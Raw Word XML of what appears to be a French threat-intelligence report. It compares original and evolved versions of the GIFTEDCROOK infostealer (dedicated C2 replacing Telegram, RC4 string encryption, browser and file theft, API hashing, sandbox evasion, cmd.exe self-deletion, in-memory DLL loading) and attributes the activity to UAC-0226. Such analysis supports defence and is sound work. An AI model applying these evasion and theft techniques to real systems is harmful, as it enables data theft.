                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="523874"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2898140" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2898140" y="523874"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1357629" y="523874"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2897505" y="523874"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2897505" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1357629" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1357629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356994" y="523874"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1356994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86720" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2258060</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>990609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4402455" cy="523874"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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2455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2455" h="523874">
                          <a:moveTo>
                            <a:pt x="1540510" y="523874"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4402455" y="523874"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4402455" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1540510" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1540510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539875" y="523874"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="153987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3104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67070" cy="5679439"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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7070" cy="5679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7070" h="5679439">
                          <a:moveTo>
                            <a:pt x="3175" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3175" y="5679439"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="5676265"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5767070" y="5676265"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="5151754"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="5151754"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="4199255"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="4199255"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="3502024"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="3502024"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="3150235"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="3150235"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="2625724"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="2625724"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="2101215"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="2101215"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1403985"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="1403985"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1052195"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="1052195"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="527685"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="527685"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3174"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="576707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4128" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2258060</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>996959</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="5666740"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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666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666740">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="566674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5152" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3798570</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>996959</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="5666740"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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666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666740">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="566674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6176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990609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="5679439"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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6794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679439">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="567943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3584" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3832859</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5228599</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2636520" cy="414020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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6520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36520" h="414020">
                          <a:moveTo>
                            <a:pt x="635" y="414020"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="214629"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="936625" y="214629"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="936625" y="414020"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="215265"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="937260" y="215265"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2355214" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2355214" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2635885" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2635885" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2354580" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2636520" y="634"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1339215" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1339215" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1947545" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1947545" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1338579" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1948179" y="634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892174" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="892174" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="89281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7680" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1425575</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8161029</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="525783" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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578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578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525780" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="52578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870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0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972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0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0752" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2513330</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1002053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1106688" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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66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GIFTEDCROOK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1776" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4276090</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1082305</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1943807" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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380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74"/>
                            <w:spacing w:val="44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(évolution, 2026)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2800" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1347469</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1088413</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="501341" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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3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Aspect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3824" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2536189</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1175408</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1021305" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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13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(original, 2025)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4848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1526563</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1484581" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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45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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">API Telegram</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="10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7"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> Bot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5872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1526563</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2862483" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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24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Serveurs C2 dédiés, double couche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68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1612923</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="687302" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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30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Exfiltration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7920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1699918</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="990152" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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15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(jetons en clair)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8944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1699918</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1660989" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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098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chiffrement RC4 + HTTPS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9968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2051073</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1440404" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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4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Chrome, Edge, Firefox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0992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2051073</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1905605" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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6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Chrome, Edge, Opera, Firefox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20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2051073</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1176510" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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651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Navigateurs ciblés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3040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2402228</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1545473" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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54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Non (ajouté dans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4064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2488588</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2868178" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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1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35 extensions de fichiers ciblées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5088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2575583</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="594878" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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8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versions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61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2575583</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="912477" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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Vol de fichiers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7136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2661943</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2480190" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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01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Documents, Téléchargements et TEMP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8160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2748938</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="958998" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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8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intermédiaires)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491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3100093</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1037473" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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74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Contournement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0208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3186453</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="291951" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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9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1232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3186453</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="253117" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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1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Oui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22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3273448</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="954548" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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45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d'ABE Chrome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32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3624603</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2857695" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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76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Protection</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="24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des Minimale (chemins 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4304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3624603</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2867543" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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75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Double RC4 (ASCII + UTF-16LE) avec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5328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3797958</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="943631" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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63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jetons en clair)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63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3797958</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="524950" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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9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chaînes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7376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3797958</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="912778" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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7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clé par chaîne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00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4149113</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2321513" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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15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Parcours du PEB + hachage FNV-1a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9424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4149113</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1099117" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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91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Imports statiques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04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4149113</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1222867" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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286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Résolution des API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1472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4500268</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1546108" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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610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Évasion des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sandbox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2496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4586628</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2867543" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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75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Appels factices à des fonctions identitaires +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35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4586628</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1323755" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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75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Protection</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="21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6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anti-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4544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4673623</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1546108" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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610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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="2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0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temporisation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55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4759983</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="516868" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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8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analyse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6592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4759983</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2534930" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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49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délais pseudo-aléatoires via PRNG LCG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7616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4846978</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="485555" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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55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(Sleep)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8640" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3852545</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5213573</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2849763" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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976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1"/>
                            <w:u w:val="single" w:color="000000"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">cmd.exe /c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2"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> avec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timeout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2"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> puis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del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 +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9664" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3852545</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5428838</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2849763" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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976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DeleteFileW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 (supprime tous les artefacts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06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5498488</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1122468" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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24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Auto-suppression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1712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5498488</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1432602" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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260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Boucle via script batch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2736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5625488</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2868178" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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1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temporaires ainsi que le raccourci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3760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5798843</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="757551" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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5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démarrage)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47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6149998</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1292599" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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5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2"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Empreinte sur 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5808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6149998</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1499926" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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992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Fichier EXE présent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6832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6149998</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2867543" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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75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DLL encodée en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sub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sur le disque, décodée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78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6323353</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="447158" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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71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disque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8880" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3834129</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6323353</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2379907" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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990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puis chargée uniquement en mémoire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9904" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2293619</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6323353</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="827840" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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78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sur le disque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0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6914538</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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 passage de Telegram à des serveurs C2 dédiés est significatif en termes de sécurité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1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7087893</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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opérationnelle et s’inscrit peut-être également dans une évolution plus large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2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7261248</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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l’environnement opérationnel : en février 2026, la Russie a commencé à restreindre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4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7434603</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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sévèrement l’accès à Telegram, en ralentissant le service avant de procéder à un blocage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5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7607958</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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total. Les échantillons originaux de GIFTEDCROOK contenaient des jetons de bot Telegram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7781313</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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en clair qui pouvaient être facilement extraits et utilisés à des fins de surveillance ou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7954668</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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2"/>
                          </w:rPr>
                          <w:t xml:space="preserve">neutralis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ation. D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ans la nouvelle version, les URLs du C2 sont chiffrées en RC4 dans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8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8146638</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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section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.rdata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du fichier binaire. Elles peuvent toujours être récupérées de manière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9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8343288</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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statique en déchiffrant en RC4 les paires clé-blob adjacentes, mais elles ne sont plus visibles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0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8516643</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3117758" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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77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par une simple analyse de chaînes de caractères.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11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21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32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42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52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79628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731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8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942295</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1200737" cy="262309"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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0737" cy="2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29"/>
                          </w:rPr>
                          <w:t xml:space="preserve">7. Attribution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9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1467278</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2733065" cy="189445"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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065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5"/>
                          </w:rPr>
                          <w:t xml:space="preserve">7.1. SHADOW-EARTH-066 (chaîne binaire)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0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1778023</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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Trend Micro suit la chaîne de charges utiles binaires (de CVE-2025-8088 à LNK, puis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1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1948445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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Powershell et enfin à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) sous le nom de SHADOW-EARTH-066, la désignation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2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2131083</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5375031" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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503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provisoire pour l’ensemble d’intrusions que le CERT-UA suit sous le nom d’UAC-0226.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3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2406038</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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L’attribution à UAC-0226 repose sur la lignée du logiciel malveillant. L'analyse de Trend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4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2576460</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5834898" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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Micro confirme que </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle30"/>
                            <w:spacing w:val="54"/>
                          </w:rPr>
                          <w:t xml:space="preserve">result.dll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est une évolution directe de GIFTEDCROOK, l'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info stealer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5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2759098</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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que le CERT-UA avait attribué à UAC-0226 en avril 2025. Les deux partagent la même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6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2932453</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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chaîne d’outils de compilation, le même framework cryptographique, les mêmes contrôles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7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3105808</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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anti-analyse et le même protocole d’exfiltration, comme détaillé dans la comparaison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8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3279163</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1370949" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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094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d’évolution ci-dessus.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9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3554118</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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L’analyse des horodatages fournit un élément d’attribution supplémentaire. Tous les fichiers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0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3727473</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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LNK partagent le même horodatage de création et le même identifiant de machine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1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3897895</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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compilation (</w:t>
